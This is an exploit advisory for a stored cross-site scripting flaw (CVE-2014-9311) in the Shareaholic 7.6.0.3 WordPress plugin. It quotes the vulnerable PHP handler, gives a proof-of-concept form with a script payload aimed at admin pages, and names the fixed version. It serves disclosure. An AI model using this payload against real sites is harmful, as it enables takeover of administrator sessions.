# Exploit Title: Shareaholic 7.6.0.3 XSS # Date: 10-11-2014 # Software Link: https://wordpress.org/plugins/shareaholic/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9311 # Category: webapps 1. Description ShareaholicAdmin::add_location is accessible for every registered user. File: shareaholic\shareaholic.php add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location')); $_POST['location'] is not escaped. File: shareaholic\admin.php public static function add_location() { $location = $_POST['location']; $app_name = $location['app_name']; ShareaholicUtilities::update_options(array( 'location_name_ids' => array( $app_name => array( $location['name'] => $location['id'] ), ), $app_name => array( $location['name'] => 'on' ) )); echo json_encode(array( 'status' => "successfully created a new {$location['app_name']} location", 'id' => $location['id'] )); die(); } http://security.szurek.pl/shareaholic-7603-xss.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="shareaholic_add_location"> <input type="hidden" name="location[app_name]" value="recommendations"> <input type="hidden" name="location[name]" value="post_below_content"> XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>"> <input type="submit" value="Hack!"> </form> XSS will be visible for admin: http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings 3. Solution: Update to version 7.6.1.0 https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/